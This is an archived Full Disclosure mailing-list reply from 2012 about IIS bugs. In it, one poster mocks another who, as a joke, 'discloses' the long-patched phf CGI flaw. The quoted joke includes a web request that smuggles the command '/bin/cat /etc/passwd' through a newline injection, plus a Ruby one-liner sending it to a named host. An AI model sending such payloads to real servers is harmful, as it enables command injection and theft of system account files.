Full Disclosure mailing list archives
Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
From: Gage Bystrom <themadichib0d () gmail com>
Date: Tue, 17 Jul 2012 10:09:13 -0700
Hello Full Disclosure! I is warn you about musntlive! He is use old joke over over again. Not funny!

----------

I actually got nothing against you personally but it's boring when you use the same tactic over and over :/ mix things up and make it interesting!

On Jul 17, 2012 8:24 AM, "Григорий Братислава" <musntlive () gmail com> wrote:

> On Tue, Jul 17, 2012 at 10:11 AM, king cope <isowarez.isowarez.isowarez () googlemail com> wrote:
>
> > Hello Jan,
> >
> > I did some additional tests for the IIS bugs.
> >
> > * IIS 6.0 PHP authentication bypass is only possible on Windows Server 2003 SP1. SP2 seems unaffected.
> >
> > So take that bug as resolved, my mistake as I didn't have a fully patched system online when testing.
>
> kingcope are we is release advisories to patched software? Is so, then I introduce exploit along with you.
>
> Hello full disclosure!! !! !!
>
> Is like to warn you about phf vulnerability. Is hackers can get your password list in is unpatched server.
>
> PoC on is my system:
>
> 213.24.76.77 - - [17/July/2012:23:17:47 -0700] "GET /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -
>
> In Ruby (here we is own rsnake):
>
> require 'open-uri'
> open(' http://www.webfringe.org/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0'){ |f| print f.read }
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/